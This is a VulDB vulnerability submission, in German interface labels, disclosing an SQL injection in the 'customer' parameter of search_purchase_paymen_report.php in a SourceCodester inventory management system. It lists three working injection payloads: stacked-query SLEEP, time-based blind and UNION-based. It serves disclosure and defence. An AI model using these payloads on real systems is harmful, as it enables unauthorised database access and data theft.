Submit #199093: SQL injection vulnerability exists in inventory management systeminfo

TitelSQL injection vulnerability exists in inventory management system
BeschreibungSQL injection vulnerability exists in customer parameter of app/ajax/search_purchase_paymen_report.php file of inventory management system Important user data or system data may be leaked and system security may be compromised The environment is secure and the information can be used by malicious users. Payload: &customer=-10';SELECT SLEEP(5)#&issuedate=issuedate or &customer=-10' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))MzLg) AND 'SVby'='SVby&issuedate=issuedate or &customer=-10' UNION ALL SELECT NULL,CONCAT(0x71626b7071,0x72737a437946566263627a566e565645726f5872656a6456486255527a6f76776f4d4d7256756663,0x7170707171),NULL,NULL,NULL-- -&issuedate=issuedate
Quelle⚠️ https://github.com/ZhangXiaoDan1/cve_hub/blob/main/Free%20and%20Open%20Source%20inventory%20management%20system%20-%20vuln%204.pdf
Benutzer
 Zhang XiaoDan (UID 53255)
Einreichung24.08.2023 06:06 (vor 3 Jahren)
Moderieren27.08.2023 08:00 (3 days later)
StatusAkzeptiert
VulDB Eintrag238158 [SourceCodester Inventory Management System 1.0 search_purchase_paymen_report.php Kunde SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Do you know our Splunk app?

Download it now for free!